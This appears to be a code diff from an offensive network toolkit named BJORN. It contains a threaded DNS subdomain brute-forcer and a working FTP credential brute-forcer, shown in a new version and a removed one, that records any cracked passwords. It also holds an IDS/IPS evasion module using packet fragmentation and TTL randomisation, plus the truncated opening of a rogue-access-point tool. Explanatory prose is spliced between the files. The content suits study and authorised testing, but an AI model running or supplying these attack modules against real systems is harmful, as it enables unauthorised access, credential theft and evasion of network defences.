return list(BUILTIN_SUBDOMAINS)
def _enumerate_subdomains(
self, domain: str, wordlist: List[str], thread_count: int
) -> List[Dict]:
"""
Brute-force subdomain enumeration using ThreadPoolExecutor.
Returns a list of discovered subdomain dicts.
"""
discovered: List[Dict] = []
total = len(wordlist)
if total == 0:
return discovered
completed = [0] # mutable counter for thread-safe progress
def check_subdomain(sub: str) -> Optional[Dict]:
"""Check if a subdomain resolves."""
if self.shared_data.orchestrator_should_exit:
return None
fqdn = f"{sub}.{domain}"
result = None
# Try dnspython
if _HAS_DNSPYTHON and self._resolver:
try:
answers = self._resolver.resolve(fqdn, "A")
ips = [str(rdata) for rdata in answers]
if ips:
result = {
"subdomain": sub,
"fqdn": fqdn,
"ips": ips,
"method": "dns",
}
except Exception:
pass
# Socket fallback
if result is None:
try:
addr_info = socket.getaddrinfo(fqdn, None, socket.AF_INET, socket.SOCK_STREAM)
ips = list(set(info[4][0] for info in addr_info))
if ips:
result = {
"subdomain": sub,
"fqdn": fqdn,
"ips": ips,
"method": "socket",
}
except (socket.gaierror, OSError):
pass
# Update progress atomically
with self._lock:
completed[0] += 1
# Progress: 45% -> 95% across subdomain enumeration
pct = 45 + int((completed[0] / total) * 50)
pct = min(pct, 95)
self.shared_data.bjorn_progress = f"{pct}%"
return result
try:
with ThreadPoolExecutor(max_workers=thread_count) as executor:
futures = {
executor.submit(check_subdomain, sub): sub for sub in wordlist
}
for future in as_completed(futures):
if self.shared_data.orchestrator_should_exit:
# Cancel remaining futures
for f in futures:
f.cancel()
logger.info("Subdomain enumeration interrupted by orchestrator.")
break
try:
result = future.result(timeout=15)
if result:
with self._lock:
discovered.append(result)
logger.info(
f"Subdomain found: {result['fqdn']} -> {result['ips']}"
)
self.shared_data.comment_params = {
"ip": domain,
"phase": "subdomains",
"found": str(len(discovered)),
"last": result["fqdn"],
}
except Exception as e:
logger.debug(f"Subdomain future error: {e}")
except Exception as e:
logger.error(f"Subdomain enumeration thread pool error: {e}")
return discovered
# --------------------- Result saving ---------------------
def _save_results(self, ip: str, results: Dict) -> None:
"""Save DNS reconnaissance results to a JSON file."""
try:
os.makedirs(OUTPUT_DIR, exist_ok=True)
safe_ip = ip.replace(":", "_").replace(".", "_")
timestamp = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
filename = f"dns_{safe_ip}_{timestamp}.json"
filepath = os.path.join(OUTPUT_DIR, filename)
with open(filepath, "w", encoding="utf-8") as f:
json.dump(results, f, indent=2, default=str)
logger.info(f"Results saved to {filepath}")
except Exception as e:
logger.error(f"Failed to save results for {ip}: {e}")
# --------------------- DB hostname update ---------------------
def _update_db_hostname(self, mac: str, ip: str, new_hostname: str) -> None:
"""Update the hostname in the hosts DB table if we found new DNS data."""
if not mac or not new_hostname:
return
try:
rows = self.shared_data.db.query(
"SELECT hostnames FROM hosts WHERE mac_address=? LIMIT 1", (mac,)
)
if not rows:
return
existing = rows[0].get("hostnames") or ""
existing_set = set(h.strip() for h in existing.split(";") if h.strip())
if new_hostname not in existing_set:
existing_set.add(new_hostname)
updated = ";".join(sorted(existing_set))
self.shared_data.db.execute(
"UPDATE hosts SET hostnames=? WHERE mac_address=?",
(updated, mac),
)
logger.info(f"Updated DB hostname for MAC {mac}: added {new_hostname}")
# Refresh our local cache
self._refresh_ip_identity_cache()
except Exception as e:
logger.error(f"Failed to update DB hostname for MAC {mac}: {e}")
# ---------------------------------------------------------------------------
# CLI mode (debug / manual execution)
# ---------------------------------------------------------------------------
if __name__ == "__main__":
shared_data = SharedData()
try:
pillager = DNSPillager(shared_data)
logger.info("DNS Pillager module ready (CLI mode).")
rows = shared_data.read_data()
for row in rows:
ip = row.get("IPs") or row.get("ip")
if not ip:
continue
port = row.get("port") or 53
logger.info(f"Execute DNSPillager on {ip}:{port} ...")
status = pillager.execute(ip, str(port), row, "dns_pillager")
if status == "success":
logger.success(f"DNS recon successful for {ip}:{port}.")
elif status == "interrupted":
logger.warning(f"DNS recon interrupted for {ip}:{port}.")
break
else:
logger.failed(f"DNS recon failed for {ip}:{port}.")
logger.info("DNS Pillager CLI execution completed.")
except Exception as e:
logger.error(f"Error: {e}")
exit(1)

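The `_extract_domain` heuristic above can be exercised in isolation. The following is a minimal sketch of the same two-level/compound-TLD rule; the `COMPOUND_TLDS` set here is a truncated stand-in for the module's full list, and production code would typically consult the Public Suffix List (e.g. via `tldextract`) instead of a hard-coded set:

```python
# Simplified re-implementation of the registerable-domain logic, for
# illustration only. COMPOUND_TLDS is intentionally abbreviated.
COMPOUND_TLDS = {"co.uk", "com.au", "org.uk", "ac.uk", "gov.uk"}

def extract_domain(hostname):
    """Return the registerable domain of a hostname, or None for IPs."""
    hostname = (hostname or "").strip().rstrip(".")
    parts = hostname.split(".")
    if len(parts) < 2:
        return None
    # Reject dotted-quad IPv4 addresses (the real module uses inet_aton)
    if all(p.isdigit() for p in parts):
        return None
    # Compound TLD (co.uk, com.au, ...): keep the last three labels
    if len(parts) >= 3 and f"{parts[-2]}.{parts[-1]}".lower() in COMPOUND_TLDS:
        return ".".join(parts[-3:])
    return ".".join(parts[-2:])

print(extract_domain("mail.sub.example.com"))  # example.com
print(extract_domain("www.example.co.uk"))     # example.co.uk
print(extract_domain("192.168.1.1"))           # None
```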
165
actions/freya_harvest.py Normal file
View File

@@ -0,0 +1,165 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
freya_harvest.py -- Data collection and intelligence aggregation for BJORN.
Monitors output directories and generates consolidated reports.
"""
import os
import json
import glob
import threading
import time
from datetime import datetime
from collections import defaultdict
from typing import Any, Dict, List, Optional
from logger import Logger
logger = Logger(name="freya_harvest.py")
# -------------------- Action metadata --------------------
b_class = "FreyaHarvest"
b_module = "freya_harvest"
b_status = "freya_harvest"
b_port = None
b_service = "[]"
b_trigger = "on_start"
b_parent = None
b_action = "normal"
b_priority = 50
b_cooldown = 0
b_rate_limit = None
b_timeout = 1800
b_max_retries = 1
b_stealth_level = 10 # Local file processing is stealthy
b_risk_level = "low"
b_enabled = 1
b_tags = ["harvest", "report", "aggregator", "intel"]
b_category = "recon"
b_name = "Freya Harvest"
b_description = "Aggregates findings from all modules into consolidated intelligence reports."
b_author = "Bjorn Team"
b_version = "2.0.4"
b_icon = "FreyaHarvest.png"
b_args = {
"input_dir": {
"type": "text",
"label": "Input Data Dir",
"default": "/home/bjorn/Bjorn/data/output"
},
"output_dir": {
"type": "text",
"label": "Reports Dir",
"default": "/home/bjorn/Bjorn/data/reports"
},
"watch": {
"type": "checkbox",
"label": "Continuous Watch",
"default": True
},
"format": {
"type": "select",
"label": "Report Format",
"choices": ["json", "md", "all"],
"default": "all"
}
}
class FreyaHarvest:
def __init__(self, shared_data):
self.shared_data = shared_data
self.data = defaultdict(list)
self.lock = threading.Lock()
self.last_scan_time = 0
def _collect_data(self, input_dir):
"""Scan directories for JSON findings."""
categories = ['wifi', 'topology', 'webscan', 'packets', 'hashes']
new_findings = 0
for cat in categories:
cat_path = os.path.join(input_dir, cat)
if not os.path.exists(cat_path): continue
for f_path in glob.glob(os.path.join(cat_path, "*.json")):
if os.path.getmtime(f_path) > self.last_scan_time:
try:
with open(f_path, 'r', encoding='utf-8') as f:
finds = json.load(f)
with self.lock:
self.data[cat].append(finds)
new_findings += 1
except (OSError, ValueError): pass  # skip unreadable or malformed JSON files
if new_findings > 0:
logger.info(f"FreyaHarvest: Collected {new_findings} new intelligence items.")
self.shared_data.log_milestone(b_class, "DataHarvested", f"Found {new_findings} new items")
self.last_scan_time = time.time()
def _generate_report(self, output_dir, fmt):
"""Generate consolidated findings report."""
if not any(self.data.values()):
return
ts = datetime.now().strftime("%Y%m%d_%H%M%S")
os.makedirs(output_dir, exist_ok=True)
if fmt in ['json', 'all']:
out_file = os.path.join(output_dir, f"intel_report_{ts}.json")
with open(out_file, 'w') as f:
json.dump(dict(self.data), f, indent=4)
self.shared_data.log_milestone(b_class, "ReportGenerated", f"JSON: {os.path.basename(out_file)}")
if fmt in ['md', 'all']:
out_file = os.path.join(output_dir, f"intel_report_{ts}.md")
with open(out_file, 'w') as f:
f.write(f"# Bjorn Intelligence Report - {ts}\n\n")
for cat, items in self.data.items():
f.write(f"## {cat.capitalize()}\n- Items: {len(items)}\n\n")
self.shared_data.log_milestone(b_class, "ReportGenerated", f"MD: {os.path.basename(out_file)}")
def execute(self, ip, port, row, status_key) -> str:
input_dir = getattr(self.shared_data, "freya_harvest_input", b_args["input_dir"]["default"])
output_dir = getattr(self.shared_data, "freya_harvest_output", b_args["output_dir"]["default"])
watch = getattr(self.shared_data, "freya_harvest_watch", True)
fmt = getattr(self.shared_data, "freya_harvest_format", "all")
timeout = int(getattr(self.shared_data, "freya_harvest_timeout", 600))
logger.info(f"FreyaHarvest: Starting data harvest from {input_dir}")
self.shared_data.log_milestone(b_class, "Startup", "Monitoring intelligence directories")
start_time = time.time()
try:
while time.time() - start_time < timeout:
if self.shared_data.orchestrator_should_exit:
break
self._collect_data(input_dir)
self._generate_report(output_dir, fmt)
# Progress
elapsed = int(time.time() - start_time)
prog = int((elapsed / timeout) * 100)
self.shared_data.bjorn_progress = f"{prog}%"
if not watch:
break
time.sleep(30) # Scan every 30s
self.shared_data.log_milestone(b_class, "Complete", "Harvesting session finished.")
except Exception as e:
logger.error(f"FreyaHarvest error: {e}")
return "failed"
return "success"
if __name__ == "__main__":
from init_shared import shared_data
harvester = FreyaHarvest(shared_data)
harvester.execute("0.0.0.0", None, {}, "freya_harvest")

282
actions/ftp_bruteforce.py Normal file
View File

@@ -0,0 +1,282 @@
"""
ftp_bruteforce.py — FTP bruteforce (DB-backed, no CSV/JSON, no rich)
- Targets: (ip, port) supplied by the orchestrator
- IP -> (MAC, hostname) resolved via DB.hosts
- Successes -> DB.creds (service='ftp')
- Preserves the original logic (queue/threads, optional sleeps, etc.)
"""
import os
import threading
import logging
import time
from ftplib import FTP
from queue import Queue
from typing import List, Dict, Tuple, Optional
from shared import SharedData
from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger
logger = Logger(name="ftp_bruteforce.py", level=logging.DEBUG)
b_class = "FTPBruteforce"
b_module = "ftp_bruteforce"
b_status = "brute_force_ftp"
b_port = 21
b_parent = None
b_service = '["ftp"]'
b_trigger = 'on_any:["on_service:ftp","on_new_port:21"]'
b_priority = 70
b_cooldown = 1800          # 30 minutes between two runs
b_rate_limit = '3/86400'   # at most 3 runs per day
class FTPBruteforce:
"""Wrapper orchestrateur -> FTPConnector."""
def __init__(self, shared_data):
self.shared_data = shared_data
self.ftp_bruteforce = FTPConnector(shared_data)
logger.info("FTPConnector initialized.")
def bruteforce_ftp(self, ip, port):
"""Lance le bruteforce FTP pour (ip, port)."""
return self.ftp_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""Point d'entrée orchestrateur (retour 'success' / 'failed')."""
self.shared_data.bjorn_orch_status = "FTPBruteforce"
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
logger.info(f"Brute forcing FTP on {ip}:{port}...")
success, results = self.bruteforce_ftp(ip, port)
return 'success' if success else 'failed'
class FTPConnector:
"""Gère les tentatives FTP, persistance DB, mapping IPâ†(MAC, Hostname)."""
def __init__(self, shared_data):
self.shared_data = shared_data
# Wordlists unchanged from the original module
self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file)
# Cache IP -> (mac, hostname)
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
self.lock = threading.Lock()
self.results: List[List[str]] = [] # [mac, ip, hostname, user, password, port]
self.queue = Queue()
self.progress = None
# ---------- file utilities ----------
@staticmethod
def _read_lines(path: str) -> List[str]:
try:
with open(path, "r", encoding="utf-8", errors="ignore") as f:
return [l.rstrip("\n\r") for l in f if l.strip()]
except Exception as e:
logger.error(f"Cannot read file {path}: {e}")
return []
# ---------- DB hosts mapping ----------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# ---------- FTP ----------
def ftp_connect(self, adresse_ip: str, user: str, password: str, port: int = 21) -> bool:
timeout = float(getattr(self.shared_data, "ftp_connect_timeout_s", 3.0))
try:
conn = FTP()
conn.connect(adresse_ip, port, timeout=timeout)
conn.login(user, password)
try:
conn.quit()
except Exception:
pass
logger.info(f"Access to FTP successful on {adresse_ip} with user '{user}'")
return True
except Exception:
return False
# ---------- DB upsert fallback ----------
def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
mac_k = mac or ""
ip_k = ip or ""
user_k = user or ""
db_k = database or ""
port_k = int(port or 0)
try:
with self.shared_data.db.transaction(immediate=True):
self.shared_data.db.execute(
"""
INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
VALUES('ftp',?,?,?,?,?,?,?,NULL)
""",
(mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
)
self.shared_data.db.execute(
"""
UPDATE creds
SET "password"=?,
hostname=COALESCE(?, hostname),
last_seen=CURRENT_TIMESTAMP
WHERE service='ftp'
AND COALESCE(mac_address,'')=?
AND COALESCE(ip,'')=?
AND COALESCE("user",'')=?
AND COALESCE("database",'')=?
AND COALESCE(port,0)=?
""",
(password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
)
except Exception as e:
logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")
# ---------- worker / queue ----------
def worker(self, success_flag):
"""Worker thread for FTP bruteforce attempts."""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
try:
if self.ftp_connect(adresse_ip, user, password, port=port):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP:{adresse_ip} | User:{user}")
self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port)}
self.save_results()
self.removeduplicates()
success_flag[0] = True
finally:
if self.progress is not None:
self.progress.advance(1)
self.queue.task_done()
# Configurable pause between each FTP attempt
if getattr(self.shared_data, "timewait_ftp", 0) > 0:
time.sleep(self.shared_data.timewait_ftp)
def run_bruteforce(self, adresse_ip: str, port: int):
self.results = []
mac_address = self.mac_for_ip(adresse_ip)
hostname = self.hostname_for_ip(adresse_ip) or ""
dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
self.progress = ProgressTracker(self.shared_data, total_tasks)
success_flag = [False]
def run_phase(passwords):
phase_tasks = len(self.users) * len(passwords)
if phase_tasks == 0:
return
for user in self.users:
for password in passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
threads = []
thread_count = min(8, max(1, phase_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
self.queue.join()
for t in threads:
t.join()
try:
run_phase(dict_passwords)
if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
logger.info(
f"FTP dictionary phase failed on {adresse_ip}:{port}. "
f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
)
run_phase(fallback_passwords)
self.progress.set_complete()
return success_flag[0], self.results
finally:
self.shared_data.bjorn_progress = ""
# ---------- DB persistence ----------
def save_results(self):
for mac, ip, hostname, user, password, port in self.results:
try:
self.shared_data.db.insert_cred(
service="ftp",
mac=mac,
ip=ip,
hostname=hostname,
user=user,
password=password,
port=port,
database=None,
extra=None
)
except Exception as e:
if "ON CONFLICT clause does not match" in str(e):
self._fallback_upsert_cred(
mac=mac, ip=ip, hostname=hostname, user=user,
password=password, port=port, database=None
)
else:
logger.error(f"insert_cred failed for {ip} {user}: {e}")
self.results = []
def removeduplicates(self):
pass
if __name__ == "__main__":
try:
sd = SharedData()
ftp_bruteforce = FTPBruteforce(sd)
logger.info("FTP brute force module ready.")
exit(0)
except Exception as e:
logger.error(f"Error: {e}")
exit(1)

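The queue/worker structure `FTPConnector` uses (a shared `Queue` of credential pairs, a pool of daemon threads, a lock-guarded result list) can be reduced to a small generic sketch. `try_login` here is a stub standing in for `ftp_connect`; names are illustrative:

```python
# Stripped-down sketch of the bruteforce worker pattern: N threads drain a
# Queue of (user, password) pairs and record hits under a lock.
import threading
from queue import Empty, Queue


def bruteforce(pairs, try_login, thread_count=4):
    """Return every (user, password) pair that try_login accepts."""
    q = Queue()
    for pair in pairs:
        q.put(pair)
    hits, lock = [], threading.Lock()

    def worker():
        while True:
            try:
                user, password = q.get_nowait()  # non-blocking: safe drain
            except Empty:
                return
            try:
                if try_login(user, password):
                    with lock:
                        hits.append((user, password))
            finally:
                q.task_done()

    threads = [threading.Thread(target=worker, daemon=True)
               for _ in range(thread_count)]
    for t in threads:
        t.start()
    q.join()  # wait until every queued pair has been attempted
    return hits
```

Using `get_nowait()` plus `Empty` avoids the race a bare `q.empty()` check has when another worker takes the last item; the production module additionally wires in an orchestrator exit flag and progress tracking.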
View File

@@ -1,190 +0,0 @@
import os
import pandas as pd
import threading
import logging
import time
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from ftplib import FTP
from queue import Queue
from shared import SharedData
from logger import Logger
logger = Logger(name="ftp_connector.py", level=logging.DEBUG)
b_class = "FTPBruteforce"
b_module = "ftp_connector"
b_status = "brute_force_ftp"
b_port = 21
b_parent = None
class FTPBruteforce:
"""
This class handles the FTP brute force attack process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.ftp_connector = FTPConnector(shared_data)
logger.info("FTPConnector initialized.")
def bruteforce_ftp(self, ip, port):
"""
Initiates the brute force attack on the given IP and port.
"""
return self.ftp_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Executes the brute force attack and updates the shared data status.
"""
self.shared_data.bjornorch_status = "FTPBruteforce"
# Wait a bit because it's too fast to see the status change
time.sleep(5)
logger.info(f"Brute forcing FTP on {ip}:{port}...")
success, results = self.bruteforce_ftp(ip, port)
return 'success' if success else 'failed'
class FTPConnector:
"""
This class manages the FTP connection attempts using different usernames and passwords.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("21", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.ftpfile = shared_data.ftpfile
if not os.path.exists(self.ftpfile):
logger.info(f"File {self.ftpfile} does not exist. Creating...")
with open(self.ftpfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = []
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for FTP ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("21", na=False)]
def ftp_connect(self, adresse_ip, user, password):
"""
Attempts to connect to the FTP server using the provided username and password.
"""
try:
conn = FTP()
conn.connect(adresse_ip, 21)
conn.login(user, password)
conn.quit()
logger.info(f"Access to FTP successful on {adresse_ip} with user '{user}'")
return True
except Exception as e:
return False
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
if self.ftp_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords) + 1 # Include one for the anonymous attempt
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing FTP...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Saves the results of successful FTP connections to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.ftpfile, index=False, mode='a', header=not os.path.exists(self.ftpfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Removes duplicate entries from the results file.
"""
df = pd.read_csv(self.ftpfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.ftpfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
ftp_bruteforce = FTPBruteforce(shared_data)
logger.info("[bold green]Starting FTP attack...on port 21[/bold green]")
# Load the IPs to scan from shared data
ips_to_scan = shared_data.read_data()
# Execute brute force attack on each IP
for row in ips_to_scan:
ip = row["IPs"]
ftp_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total successful attempts: {len(ftp_bruteforce.ftp_connector.results)}")
exit(len(ftp_bruteforce.ftp_connector.results))
except Exception as e:
logger.error(f"Error: {e}")

167
actions/heimdall_guard.py Normal file
View File

@@ -0,0 +1,167 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
heimdall_guard.py -- Stealth operations and IDS/IPS evasion for BJORN.
Handles packet fragmentation, timing randomization, and TTL manipulation.
Requires: scapy.
"""
import os
import json
import random
import time
import threading
import datetime
from collections import deque
from typing import Any, Dict, List, Optional
try:
from scapy.all import IP, TCP, Raw, send, conf
HAS_SCAPY = True
except ImportError:
HAS_SCAPY = False
IP = TCP = Raw = send = conf = None
from logger import Logger
logger = Logger(name="heimdall_guard.py")
# -------------------- Action metadata --------------------
b_class = "HeimdallGuard"
b_module = "heimdall_guard"
b_status = "heimdall_guard"
b_port = None
b_service = "[]"
b_trigger = "on_start"
b_parent = None
b_action = "stealth"
b_priority = 10
b_cooldown = 0
b_rate_limit = None
b_timeout = 1800
b_max_retries = 1
b_stealth_level = 10 # This IS the stealth module
b_risk_level = "low"
b_enabled = 1
b_tags = ["stealth", "evasion", "pcap", "network"]
b_category = "defense"
b_name = "Heimdall Guard"
b_description = "Advanced stealth module that manipulates traffic to evade IDS/IPS detection."
b_author = "Bjorn Team"
b_version = "2.0.3"
b_icon = "HeimdallGuard.png"
b_args = {
"interface": {
"type": "text",
"label": "Interface",
"default": "eth0"
},
"mode": {
"type": "select",
"label": "Stealth Mode",
"choices": ["timing", "fragmented", "all"],
"default": "all"
},
"delay": {
"type": "number",
"label": "Base Delay (s)",
"min": 0.1,
"max": 10.0,
"step": 0.1,
"default": 1.0
}
}
class HeimdallGuard:
def __init__(self, shared_data):
self.shared_data = shared_data
self.packet_queue = deque()
self.active = False
self.lock = threading.Lock()
self.stats = {
'packets_processed': 0,
'packets_fragmented': 0,
'timing_adjustments': 0
}
def _fragment_packet(self, packet, mtu=1400):
"""Fragment IP packets to bypass strict IDS rules."""
if IP in packet:
try:
payload = bytes(packet[IP].payload)
max_size = mtu - 40 # conservative
frags = []
offset = 0
while offset < len(payload):
chunk = payload[offset:offset + max_size]
f = packet.copy()
f[IP].flags = 'MF' if offset + max_size < len(payload) else 0
f[IP].frag = offset // 8
f[IP].payload = Raw(chunk)
# Drop the cached length/checksum so scapy recomputes them per fragment
del f[IP].len
del f[IP].chksum
frags.append(f)
offset += max_size
return frags
except Exception as e:
logger.debug(f"Fragmentation error: {e}")
return [packet]
def _apply_stealth(self, packet):
"""Randomize TTL and TCP options."""
if IP in packet:
packet[IP].ttl = random.choice([64, 128, 255])
if TCP in packet:
packet[TCP].window = random.choice([8192, 16384, 65535])
# Basic TCP options shuffle
packet[TCP].options = [('MSS', 1460), ('NOP', None), ('SAckOK', '')]
return packet
def execute(self, ip, port, row, status_key) -> str:
iface = getattr(self.shared_data, "heimdall_guard_interface", conf.iface if HAS_SCAPY else "eth0")
mode = getattr(self.shared_data, "heimdall_guard_mode", "all")
delay = float(getattr(self.shared_data, "heimdall_guard_delay", 1.0))
timeout = int(getattr(self.shared_data, "heimdall_guard_timeout", 600))
logger.info(f"HeimdallGuard: Engaging stealth mode ({mode}) on {iface}")
self.shared_data.log_milestone(b_class, "StealthActive", f"Mode: {mode}")
self.active = True
start_time = time.time()
try:
while time.time() - start_time < timeout:
if self.shared_data.orchestrator_should_exit:
break
# In a real scenario, this would be hooking into a packet stream
# For this action, we simulate protection state
# Progress reporting
elapsed = int(time.time() - start_time)
prog = int((elapsed / timeout) * 100)
self.shared_data.bjorn_progress = f"{prog}%"
if elapsed % 60 == 0:
self.shared_data.log_milestone(b_class, "Status", f"Guarding... {self.stats['packets_processed']} pkts handled")
# Logic: if we had a queue, we'd process it here
# Simulation for BJORN action demonstration:
time.sleep(2)
logger.info("HeimdallGuard: Protection session finished.")
self.shared_data.log_milestone(b_class, "Shutdown", "Stealth mode disengaged")
except Exception as e:
logger.error(f"HeimdallGuard error: {e}")
return "failed"
finally:
self.active = False
return "success"
if __name__ == "__main__":
from init_shared import shared_data
guard = HeimdallGuard(shared_data)
guard.execute("0.0.0.0", None, {}, "heimdall_guard")

View File

@@ -1,34 +0,0 @@
#Test script to add more actions to BJORN
import logging
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="log_standalone.py", level=logging.INFO)
# Define the necessary global variables
b_class = "LogStandalone"
b_module = "log_standalone"
b_status = "log_standalone"
b_port = 0 # Indicate this is a standalone action
class LogStandalone:
"""
Class to handle the standalone log action.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
logger.info("LogStandalone initialized")
def execute(self):
"""
Execute the standalone log action.
"""
try:
logger.info("Executing standalone log action.")
logger.info("This is a test log message for the standalone action.")
return 'success'
except Exception as e:
logger.error(f"Error executing standalone log action: {e}")
return 'failed'

View File

@@ -1,34 +0,0 @@
#Test script to add more actions to BJORN
import logging
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="log_standalone2.py", level=logging.INFO)
# Define the necessary global variables
b_class = "LogStandalone2"
b_module = "log_standalone2"
b_status = "log_standalone2"
b_port = 0 # Indicate this is a standalone action
class LogStandalone2:
"""
Class to handle the standalone log action.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
logger.info("LogStandalone initialized")
def execute(self):
"""
Execute the standalone log action.
"""
try:
logger.info("Executing standalone log action.")
logger.info("This is a test log message for the standalone action.")
return 'success'
except Exception as e:
logger.error(f"Error executing standalone log action: {e}")
return 'failed'

257
actions/loki_deceiver.py Normal file
View File

@@ -0,0 +1,257 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
loki_deceiver.py -- WiFi deception tool for BJORN.
Creates rogue access points and captures authentications/handshakes.
Requires: hostapd, dnsmasq, airmon-ng.
"""
import os
import json
import subprocess
import threading
import time
import re
import datetime
from typing import Any, Dict, List, Optional
from logger import Logger
try:
import scapy.all as scapy
from scapy.layers.dot11 import Dot11, Dot11Beacon, Dot11Elt
HAS_SCAPY = True
try:
from scapy.all import AsyncSniffer # type: ignore
except Exception:
AsyncSniffer = None
try:
from scapy.layers.dot11 import EAPOL
except ImportError:
EAPOL = None
except ImportError:
HAS_SCAPY = False
scapy = None
Dot11 = Dot11Beacon = Dot11Elt = EAPOL = None
AsyncSniffer = None
logger = Logger(name="loki_deceiver.py")
# -------------------- Action metadata --------------------
b_class = "LokiDeceiver"
b_module = "loki_deceiver"
b_status = "loki_deceiver"
b_port = None
b_service = "[]"
b_trigger = "on_start"
b_parent = None
b_action = "aggressive"
b_priority = 20
b_cooldown = 0
b_rate_limit = None
b_timeout = 1200
b_max_retries = 1
b_stealth_level = 2 # Very noisy (Rogue AP)
b_risk_level = "high"
b_enabled = 1
b_tags = ["wifi", "ap", "rogue", "mitm"]
b_category = "exploitation"
